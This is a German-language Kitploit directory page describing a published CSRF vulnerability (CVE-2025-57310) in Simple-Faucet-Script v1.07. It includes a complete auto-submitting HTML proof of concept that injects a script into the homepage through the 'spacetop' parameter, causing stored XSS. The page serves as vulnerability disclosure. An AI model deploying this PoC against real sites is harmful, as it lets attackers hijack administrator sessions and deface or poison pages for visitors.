Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-57310 — Eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) in Salmen2/Simple-Faucet-Script v1.07 über eine manipulierte POST-Anfrage an admin.php?p=ads&c=1, die es Angreifern ermöglicht, beliebigen Code auszuführen. | Kitploit
Tools/GitHubGitHub/mmakingdom/cve-2025-57310
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmmakingdom/cve-2025-57310

CVE-2025-57310

Eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) in Salmen2/Simple-Faucet-Script v1.07 über eine manipulierte POST-Anfrage an admin.php?p=ads&c=1, die es Angreifern ermöglicht, beliebigen Code auszuführen.

Repository anzeigen
1vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-57310

Eine Cross-Site Request Forgery (CSRF)-Schwachstelle in Salmen2/Simple-Faucet-Script v1.07 über eine manipulierte POST-Anfrage an admin.php?p=ads&c=1, die es Angreifern ermöglicht, beliebigen Code auszuführen.

CWE

CWE-352: Cross-Site Request Forgery (CSRF)

CVSS v3.1 Basis-Score: 8.8 (Hoch)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Zusammenfassung

Das Produkt ist im Admin-Panel anfällig für Cross-Site Request Forgery (CSRF). Wenn ein authentifizierter Administrator eine bösartige Seite mit dem PoC besucht, führt der CSRF-Angriff zu einer unbefugten Änderung des Inhalts der Startseite.

Schritte zur Reproduktion

  1. Melden Sie sich als Administrator unter https://example.com/admin.php an.
  2. Öffnen Sie den folgenden PoC und beobachten Sie ein Alert-Popup auf der Startseite (Stored XSS).
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

Auswirkungen

Ein Angreifer kann über den Parameter spacetop beliebiges HTML/JavaScript in die Startseite injizieren, was zu gespeichertem Cross-Site Scripting (XSS) führt.

Danksagung

Muntadhar M. Ahmed (almuntadhar0x01)

Tool herunterladen